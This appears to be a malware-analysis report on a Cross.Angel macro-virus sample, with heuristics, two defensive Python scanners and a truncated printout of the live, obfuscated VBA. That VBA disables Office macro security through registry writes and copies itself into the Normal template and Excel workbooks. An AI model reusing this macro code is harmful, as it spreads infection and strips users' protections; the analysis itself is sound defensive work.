Verdict: MALICIOUS
Risk Score: 280

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample carries VBA macros of the Cross.Angel macro-virus family (its own comment tag and the MsgBox credit string name it). The Document_Close handler lowers Office macro security by writing registry values through System.PrivateProfileString with an empty file argument, which redirects the call to the registry: Word 9.0's Security\Level is set to 1 (Low), Excel 8.0's Options6 is zeroed, and Options.VirusProtection is switched off. It then copies its own code module over the first component of the Normal template (or of the active document, when run from Normal) and, via GetObject/CreateObject("excel.application"), over the ThisWorkbook module (German-localised name DieseArbeitsmappe) of every open Excel workbook, or of the workbooks in Excel's recent-files list when Excel was not already running. A companion Workbook_Deactivate handler writes the same downgrades out as a REGEDIT4 file at c:\.reg, and infection state is tracked in c:\.ini. The ClamAV detection Doc.Trojan.Across-1 corroborates the verdict. Note that the visible preview shows no Run-key or Startup-folder write; the Normal-template infection itself corresponds to ATT&CK T1137.001 (Office Template Macros).
Heuristics (5)
- ClamAV: Doc.Trojan.Across-1 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Across-1
- VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call

The Shell() hit does not appear in the portion of the script previewed below (the preview is truncated); confirm it against the full macros.bas before citing it.
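Reproducing this kind of triage outside the sandbox, as an added example that is not the analyzer's own heuristics engine: the scanner below runs rule patterns for the behaviours listed above (automation calls, registry security writes, CodeModule rewrites, auto-executing handlers) over decoded VBA source of the kind olevba's extract_macros yields. SAMPLE is a constructed excerpt mirroring the Document_Close routine in the preview, with the obfuscated identifiers replaced by readable names; the rule IDs, severities and verdict thresholds are this example's own, not the report's.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed excerpt that mirrors the Document_Close routine in the preview.
# The sample's obfuscated high-bit identifiers are replaced with readable
# names here; the object-model calls and registry paths are unchanged.
SAMPLE = r"""
' Cross.Angel
Private Sub Document_Close()
On Error Resume Next
Const TAG = "' Cross.Angel", NLINES = 132, VER = "9.0", APP = "excel.application"
If Application.Version = VER Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = &H1
Else
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0
Options.VirusProtection = (Rnd * 0)
End If
Body = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, NLINES)
If MacroContainer = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument
With Target.VBProject.VBComponents(1).CodeModule
If .Lines(1, 1) <> TAG Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, Body
End If
End With
Set XL = GetObject(, APP)
If XL = "" Then Set XL = CreateObject(APP)
End Sub
"""


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line_no: int
    text: str


# (rule id, severity, pattern).  VBA is case-insensitive, so every pattern is.
# Identifiers in this family are obfuscated, so rules key on the object-model
# surface (registry paths, CodeModule edits, automation calls) rather than names.
RULES = [
    ("VBA_SHELL", "critical", r"\bShell\s*\("),
    ("OFFICE_SECURITY_REGISTRY_WRITE", "critical",
     r'PrivateProfileString\s*\(\s*""\s*,\s*"HKEY_[^"]*\\Office\\[^"]*"\s*,\s*"(Level|Options6)"\s*\)\s*='),
    ("VIRUSPROTECTION_DISABLED", "critical", r"\bOptions\.VirusProtection\s*="),
    ("CODEMODULE_REWRITE", "critical", r"\.(DeleteLines|InsertLines)\b"),
    ("VBA_CREATEOBJECT", "high", r"\bCreateObject\s*\("),
    ("VBA_GETOBJECT", "high", r"\bGetObject\s*\("),
    ("NORMAL_TEMPLATE_ACCESS", "high", r"\bNormalTemplate\b"),
    ("VBPROJECT_ACCESS", "high", r"\.VBProject\.VBComponents\b"),
    ("REG_FILE_EMIT", "high", r'"REGEDIT4"|\bOpen\s+"[^"]*\.reg"'),
    ("AUTO_EXEC_HANDLER", "medium",
     r"\bSub\s+(Document_(Open|Close|New)|Workbook_(Open|Close|Deactivate)|Auto(Open|Close|Exec|New))\b"),
]
COMPILED = [(rule, sev, re.compile(rx, re.I)) for rule, sev, rx in RULES]


def scan_vba(source: str) -> list[Finding]:
    """Run every rule over each non-comment line of decoded VBA source."""
    findings: list[Finding] = []
    for n, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue  # comment lines carry no behaviour (the family tag "' Cross.Angel" is one)
        for rule, sev, rx in COMPILED:
            if rx.search(line):
                findings.append(Finding(rule, sev, n, line))
    return findings


# An empty first argument makes System.PrivateProfileString read/write the
# registry instead of an .ini file; a trailing "=" means it is a write.
_REG_WRITE = re.compile(
    r'PrivateProfileString\s*\(\s*""\s*,\s*"([^"]+)"\s*,\s*"([^"]+)"\s*\)\s*=', re.I)


def registry_writes(source: str) -> list[tuple[str, str]]:
    """(key path, value name) pairs the macro writes to the registry."""
    return [(m.group(1), m.group(2)) for m in _REG_WRITE.finditer(source)]


def triage(source: str) -> dict:
    """Severity-weighted summary; the verdict thresholds are this example's, not the analyzer's."""
    findings = scan_vba(source)
    counts = {"critical": 0, "high": 0, "medium": 0}
    for f in findings:
        counts[f.severity] += 1
    if counts["critical"]:
        verdict = "MALICIOUS"
    elif counts["high"]:
        verdict = "SUSPICIOUS"
    else:
        verdict = "REVIEW"
    return {
        "verdict": verdict,
        "counts": counts,
        "rules": sorted({f.rule for f in findings}),
        "registry_writes": registry_writes(source),
    }


if __name__ == "__main__":
    for f in scan_vba(SAMPLE):
        print(f"{f.severity:8} {f.rule:32} L{f.line_no}: {f.text[:70]}")
    result = triage(SAMPLE)
    print(result["verdict"], result["counts"], result["registry_writes"])
```

Against the constructed excerpt the scanner reports five critical, five high and one medium hit and no Shell() call, which matches the preview: the report's OLE_VBA_SHELL hit must come from a part of macros.bas outside the truncated preview.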
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27921 bytes | ce2ec774a495e3a6052cfb3f01f133a4466c23003f561aac0228b0943a3d9d1a | ClamAV: Doc.Trojan.Across-1 | unlikely |
Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Cross.Angel
Private Sub Document_Close()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¹®§ = &H1, ¯¹®§_ = &H0, ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 12, µ—Ê·¦ = "excel.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If Application.Version = µÈÇŠ¿ Then
Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = ¯¹®§
Else
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ¯¹®§_
Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
Options.VirusProtection = (Rnd * ¯¶˜™²)
End If
Options.SaveNormalPrompt = (Rnd * ¯¶˜™²)
’¸„„„ = ‚–˜¤�(ThisDocument.VBProject.VBComponents(¢Â¶¥•).CodeModule.Lines(¢Â¶¥•, •Ǥ Ÿ))
If MacroContainer = ActiveDocument Then Set µˆ˜ˆŸ = NormalTemplate Else Set µˆ˜ˆŸ = ActiveDocument
With µˆ˜ˆŸ.VBProject.VBComponents(¢Â¶¥•).CodeModule
If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
.DeleteLines ¢Â¶¥•, .CountOfLines
.InsertLines ¢Â¶¥•, ’¸„„„
If µˆ˜ˆŸ = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
End If
End With
If System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") <> ¢Â¶¥• Then
Set ´°ƒˆ� = GetObject(, µ—Ê·¦)
If ´°ƒˆ� = "" Then Set ´°ƒˆ� = CreateObject(µ—Ê·¦): ª±›¤Ã = ¢Â¶¥•
If ª±›¤Ã <> ¢Â¶¥• Then
For Each †�„–À In ´°ƒˆ�.Workbooks
With †�„–À.VBProject.VBComponents(¼Æ±¬•).CodeModule
If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
.DeleteLines ¢Â¶¥•, .CountOfLines
.InsertLines ¢Â¶¥•, ’¸„„„
If †�„–À.Path <> "" Then †�„–À.Save Else †�„–À.SaveAs †�„–À.FullName
End If
End With
Next
Else
For †�„–À = ¢Â¶¥• To ´°ƒˆ�.Application.RecentFiles.Maximum
´°ƒˆ�.Application.RecentFiles(†�„–À).Open
With ´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).VBProject.VBComponents(¼Æ±¬•).CodeModule
If .Lines(¢Â¶¥•, ¢Â¶¥•) <> ˆ»¾™Š Then
.DeleteLines ¢Â¶¥•, .CountOfLines
.InsertLines ¢Â¶¥•, ’¸„„„
End If
End With
´°ƒˆ�.Application.Workbooks(Application.RecentFiles(1).Name).Close ¢Â¶¥•
Next
´°ƒˆ�.Quit
End If
System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") = ¢Â¶¥•
End If
If Minute(Now()) = Int(Rnd * 60) + 1 Then MsgBox "Why I lost my angel? Can't live without you!", vbQuestion, "Cross.Angel by jackie-/Lz0NT/MVT"
If System.PrivateProfileString("c:\.ini", "Carinthia", "Word") <> ¢Â¶¥• Then System.PrivateProfileString("c:\.ini", "Carinthia", "Word") = ¢Â¶¥•
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Const ˆ»¾™Š = "' Cross.Angel", •Ǥ Ÿ = 132, µÈÇŠ¿ = "9.0", À©¸Ë¬ = "Macro", ˶ž½œ = "Tools", ¯¶˜™² = 0, ¢Â¶¥• = 1, »…¨�Ž = 10, µ—Ê·¦ = "word.application", ¼Æ±¬• = "DieseArbeitsmappe"
Application.EnableCancelKey = (Rnd * ¯¶˜™²)
If UCase(Dir("c:\.reg")) <> ".REG" Then
Open "c:\.reg" For Output As #1
Print #1, "REGEDIT4"
If Application.Version = µÈÇŠ¿ Then
Application.CommandBars(À©¸Ë¬).Controls((¢Â¶¥• + ¢Â¶¥• + ¢Â¶¥•)).Enabled = (Rnd * ¯¶˜™²)
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #1, """Level""=dword:00000001"
Else
Application.CommandBars(˶ž½œ).Controls(»…¨�Ž).Enabled = (Rnd * ¯¶˜™²)
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000
... (truncated)
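The Workbook_Deactivate routine writes a REGEDIT4 file to c:\.reg carrying the same Security\Level and Options6 downgrades; what the sample does with that file afterwards lies beyond the visible preview. A parser for that file format that flags Office macro-security downgrades, as an added example taken neither from the analyzer nor from the sample: SAMPLE_REG is constructed from the Print #1 lines in the preview plus one unrelated value as a control, and treating Excel 8.0's Options6 as a companion downgrade is an assumption, since the page does not document that value's bit layout.

```python
from __future__ import annotations

import re

# Constructed from the Print #1 lines visible in Workbook_Deactivate, plus one
# unrelated value (FirstRun) as a control that must not be flagged.
SAMPLE_REG = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]
"Options6"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Common\General]
"FirstRun"=dword:00000000
"""

# REGEDIT4 is the header this macro writes; the 5.00 header is the later form.
_HEADERS = ("REGEDIT4", "Windows Registry Editor Version 5.00")
_KEY = re.compile(r"^\[([^\]]+)\]$")
_DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')
_STRING = re.compile(r'^"([^"]+)"="(.*)"$')


def is_reg_file(text: str) -> bool:
    return text.lstrip().startswith(_HEADERS)


def parse_reg(text: str) -> dict[str, dict[str, int | str]]:
    """{key path: {value name: data}}; dword data becomes int, string data stays str.
    Other data types (hex:, expand strings) are outside what this sample writes and are skipped."""
    if not is_reg_file(text):
        raise ValueError("missing REGEDIT4 / Registry Editor 5.00 header")
    keys: dict[str, dict[str, int | str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in _HEADERS or line.startswith(";"):
            continue
        if m := _KEY.match(line):
            current = keys.setdefault(m.group(1), {})
        elif current is None:
            raise ValueError(f"value before any [key]: {line}")
        elif m := _DWORD.match(line):
            current[m.group(1)] = int(m.group(2), 16)
        elif m := _STRING.match(line):
            current[m.group(1)] = m.group(2)
    return keys


# Office 2000 (9.0) keeps per-application macro security in ...\<App>\Security\Level:
# 1 = Low (macros run without a prompt), 2 = Medium (prompt), 3 = High.
LEVEL_NAMES = {1: "Low", 2: "Medium", 3: "High"}
_SECURITY_KEY = re.compile(
    r"\\Office\\(\d+\.\d+)\\(Word|Excel|PowerPoint|Access|Outlook)\\Security$", re.I)
# Excel 97 (8.0) option flags; this sample zeroes Options6 alongside the 9.0
# downgrade.  Reporting 0 as a companion downgrade is an assumption: the bit
# layout of Options6 is not documented on this page.
_EXCEL97_OPTIONS = r"\office\8.0\excel\microsoft excel"


def office_downgrades(reg: dict[str, dict[str, int | str]]) -> list[dict]:
    """Entries that weaken Office macro security, with the key, app, value and a reason."""
    hits = []
    for key, values in reg.items():
        m = _SECURITY_KEY.search(key)
        level = values.get("Level")
        if m and isinstance(level, int) and level < 2:
            hits.append({"key": key, "app": m.group(2), "version": m.group(1),
                         "value": "Level", "data": level,
                         "reason": f"macro security set to {LEVEL_NAMES.get(level, level)}"})
        if key.lower().endswith(_EXCEL97_OPTIONS) and values.get("Options6") == 0:
            hits.append({"key": key, "app": "Excel", "version": "8.0",
                         "value": "Options6", "data": 0,
                         "reason": "Excel 97 Options6 cleared (assumed macro-warning flags)"})
    return hits


if __name__ == "__main__":
    for h in office_downgrades(parse_reg(SAMPLE_REG)):
        print(f"{h['app']} {h['version']}: {h['value']}={h['data']} ({h['reason']})")
```

Run it over a c:\.reg recovered from a disk image, or over the registry hive values exported from a suspect host, to confirm whether the downgrade actually landed; a Level of 1 on Word 9.0 is the condition under which the Document_Close code above runs without any prompt.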